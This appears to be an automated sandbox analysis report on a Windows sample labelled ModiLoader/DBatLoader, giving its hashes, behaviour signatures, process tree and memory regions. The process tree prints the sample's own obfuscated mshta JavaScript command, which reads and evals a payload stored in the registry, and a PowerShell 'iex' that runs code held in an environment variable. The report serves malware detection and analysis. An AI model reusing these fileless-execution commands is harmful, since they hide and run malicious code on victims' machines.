Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-06-2024 01:17

General

  • Target

    9c8c94cb2f4467665c307b6da59022e6_JaffaCakes118.exe

  • Size

    271KB

  • MD5

    9c8c94cb2f4467665c307b6da59022e6

  • SHA1

    9875930cfd41636e94fedd9641c360551bb8274c

  • SHA256

    9db87af0939edd62fec396d9af38b1e554d81d969974f7977014fb80f5489f03

  • SHA512

    ae082411a8cf767722c615d370c98ad3962d8a8ab64c26c5dff39563e5a9aeadfc9174f67298281a405493f2b8a7f6c1f0afad45058e22b33fe06aa205c82be4

  • SSDEEP

    3072:l6CCZ+GH7dCCYP4dmFrSvLWG88MOE+cjqr3au5llnt6pCO4d+Lk24SBXpjihtlyJ:JVmLW/8MCp5llt6wFd5oPji7r5yTh34E

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9c8c94cb2f4467665c307b6da59022e6_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\9c8c94cb2f4467665c307b6da59022e6_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Users\Admin\AppData\Local\Temp\9c8c94cb2f4467665c307b6da59022e6_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\9c8c94cb2f4467665c307b6da59022e6_JaffaCakes118.exe"
      2⤵
        PID:3572
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:asZme7m="e";HB0=new%20ActiveXObject("WScript.Shell");h7tRteAy="i00skA79";qnXo69=HB0.RegRead("HKLM\\software\\Wow6432Node\\MHUARrN\\YCBFzU");Nh9CA="R";eval(qnXo69);sYIJ35="qFXAF6cw";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2108
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:eflkzu
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2604

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m1gmlbgm.2kw.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2604-14-0x0000000002F40000-0x0000000002F76000-memory.dmp
      Filesize

      216KB

    • memory/2604-18-0x0000000006110000-0x0000000006176000-memory.dmp
      Filesize

      408KB

    • memory/2604-31-0x0000000007EF0000-0x000000000856A000-memory.dmp
      Filesize

      6.5MB

    • memory/2604-29-0x00000000066B0000-0x00000000066CE000-memory.dmp
      Filesize

      120KB

    • memory/2604-28-0x0000000006180000-0x00000000064D4000-memory.dmp
      Filesize

      3.3MB

    • memory/2604-17-0x00000000059F0000-0x0000000005A56000-memory.dmp
      Filesize

      408KB

    • memory/2604-16-0x0000000005890000-0x00000000058B2000-memory.dmp
      Filesize

      136KB

    • memory/2604-15-0x0000000005A70000-0x0000000006098000-memory.dmp
      Filesize

      6.2MB

    • memory/2604-32-0x0000000006BC0000-0x0000000006BDA000-memory.dmp
      Filesize

      104KB

    • memory/2604-30-0x0000000006700000-0x000000000674C000-memory.dmp
      Filesize

      304KB

    • memory/3572-11-0x0000000000990000-0x0000000000A66000-memory.dmp
      Filesize

      856KB

    • memory/3572-7-0x0000000000990000-0x0000000000A66000-memory.dmp
      Filesize

      856KB

    • memory/3572-8-0x0000000000990000-0x0000000000A66000-memory.dmp
      Filesize

      856KB

    • memory/3572-5-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/3572-4-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/3572-9-0x0000000000990000-0x0000000000A66000-memory.dmp
      Filesize

      856KB

    • memory/3572-10-0x0000000000990000-0x0000000000A66000-memory.dmp
      Filesize

      856KB

    • memory/3572-2-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/3572-6-0x0000000000990000-0x0000000000A66000-memory.dmp
      Filesize

      856KB

    • memory/3572-12-0x0000000000990000-0x0000000000A66000-memory.dmp
      Filesize

      856KB